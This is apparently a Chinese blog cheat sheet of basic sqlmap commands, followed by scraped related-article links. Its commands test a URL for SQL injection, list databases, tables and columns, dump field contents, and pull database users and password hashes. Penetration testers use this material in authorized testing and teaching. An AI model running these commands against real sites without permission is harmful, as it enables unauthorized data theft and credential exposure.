判断是否存在注入

  • sqlmap -u url

当注入点后面的参数大于等于两个时,url需要加双引号
查询当前用户下的所有数据库

  • sqlmap -u url –-dbs

用于查询当前用户下的所有数据库,前提是当前用户有权限读取包含所有数据库列表信息的表
获取数据库中的表名

  • sqlmap -u url -D 数据库名 –-tables

-D是指定某一个具体的数据库,如果没有指定,则会列出数据库中所有的库的表
获取表中的字段名

  • sqlmap -u URL -D 数据库名 -T 表名 –-columns

获取字段内容

  • sqlmap -u URL -D 数据库名 -T 表名 -C 字段名1,字段名2 –-dump

获取数据库的所有用户

  • sqlmap -u URL –-users

前提是当前用户有权限读取包含所有用户的表的权限
获取数据库用户的密码

  • sqlmap -u url –passwords

列出数据库用户的密码,前提是当前用户有读取包含用户密码的权限
获取当前网站数据库的名称

  • sqlmap -u URL –-current-db

获取当前网站数据库的用户名称

  • sqlmap -u URL –-current-user

sqlmap基本命令相关推荐

  1. SQLMAP 实例COOKBOOK

    lxj616 · 2014/03/30 10:52 提醒:本文章中的所有例子均已通过乌云平台通知厂商,并按照流程已经公开(未公开的会有标识并且隐藏信息,请等待公开后自行查看),请在阅读文章的同时不要对 ...

  2. sqlmap常见提示

    提醒:本文章中的所有例子均已通过乌云平台通知厂商,并按照流程已经公开(未公开的会有标识并且隐藏信息,请等待公开后自行查看),请在阅读文章的同时不要对文中所列漏洞重复测试,谢谢 0x00 概述 本文章面 ...

  3. linux下新增ftp账号,【转】Linux下添加FTP账号和服务器、增加密码和用户,更改FTP目录...

    转自:http://blog.csdn.net/cloudday/article/details/8640234 1. 启动VSFTP服务器 A:cenos下运行:yum  install  vsft ...

  4. sqlmap的基本命令使用

    本人小白,初次认识sqlmap,很多都是转载资料,只是学习研究一下! 练习的网站可以用谷歌搜一下: cookie注入:sqlmap.py -u 注入点 --cookie "参数" ...

  5. 使用Burp,nbsp;Sqlmap进行自动化SQL注入渗透测试

    在OWSAP Top10中,注入型漏洞是排在第一位的,而在注入型漏洞中,SQL注入是远比命令行注入.Xpath注入.Ldap注入更常见.这就是本章要讲述的主要内容:在web应用程序的渗透测试中,如何使 ...

  6. mysql基本命令总结_mysql 常用基本命令总结

    mysql 常用基本命令1.登录 MySQL服务器 mysql –h ip地址:端口(如果是3306可以省略) –u mysql用户名 -p mysql -h localhost:3306 -u ro ...

  7. linux关机重启注销命令,Linux的注销、关机、重启基本命令介绍

    你想知道Linux的注销.关机.重启基本命令么?下面是小编为大家收集的Linux的注销.关机.重启基本命令介绍,希望能帮到大家. Linux的注销.关机.重启基本命令介绍 一.注销,关机,重启 注销系 ...

  8. 实验报告Linux操作系统基本命令,linux操作系统实验报告全部.doc

    linux操作系统实验报告全部 计算机操作系统 实验报告 学 号:姓 名:提交日期:2014.12.15成 绩: 东北大学秦皇岛分校 [实验题目]熟悉Linux/UNIX操作系统[实验目的]1.熟悉L ...

  9. 红帽linux终端快捷键,二、回忆redhat各种基本命令

    二.回忆redhat各种基本命令 二.回忆redhat各种基本命令 这里写目录标题一.常见基本命令 二. 关于查看文件的命令 三.快捷键 四.用户切换 五.关机.重启快捷键 以此根目录中所有文件作为演 ...

  10. sqlmap 连接mysql_sqlmap连接Mysql实现getshell | CN-SEC 中文网

    摘要 首先得知道这个玩意,sqlmap -help,不说大家也懂搜嘎. 语法为:" DBMS://USER:[email protected]_IP:DBMS_PORT/DATABASE_N ...

最新文章

  1. android在Service,BroadCast onReceiver()中弹出Dialog对话框
  2. graphical model
  3. Python基础教程:回调在编程中的含义
  4. linux系统下用GCC、JAVA和Python编程
  5. woocommerce产品选项卡描述_适合WooCommerce卖家的7款Dropshipping插件+功能介绍
  6. 数据结构实验四 排序算法的实现
  7. BOOT.INI文件的目的[微软提供]
  8. import 和 export -- ES6
  9. Git提交代码的处理流程(转)
  10. 利用ISA防火墙实现安全快速上网
  11. windows使用命令行修改用户密码
  12. python手机端给电脑端发送数据_神途传奇 (手机端+电脑端) 数据互通 传奇来袭 www.8wf.com...
  13. 【Reward is enough】Sutton、DavidSilver师徒联手:奖励机制足够实现各种目标。
  14. [C] 数组指针、指针数组及数组传参
  15. 【Opencv】Python+openCV实现全景图拼接(左右两张图片拼接成一张全景图)
  16. DNS错误是什么意思?
  17. 世界各国产品认证标致详解CCC/CCEE/CCIB/CE/CQC/CSA/ETL/FCC/GS/UL/PCT/TUV/EMC/MPR/TCO/
  18. 十大热门的大数据技术
  19. ImageNet数据集应用
  20. android使用crosswalk webview报错

热门文章

  1. 【微信小程序】flex布局
  2. java 计算8+88+888+......前12项之和
  3. QT5.14.2 + MSVC2017_64 + MySQL5.7.29 数据库驱动编译及配置
  4. bin2hex() 函数
  5. Spring bean的作用域有哪些?
  6. 面试官:什么是TCP粘包?粘包原因?如何解决?
  7. DEDECMS三级导航动态调用
  8. RT-Thread在正点原子Apollo上使用MAX30102读取心率、血氧参数
  9. 常见的U盘,内存卡修复工具及其修复方法
  10. 计算机打印机驱动f4200,惠普HP Deskjet F4238 多功能一体机驱动惠普HP Deskjet F4238 多功能一体机驱动...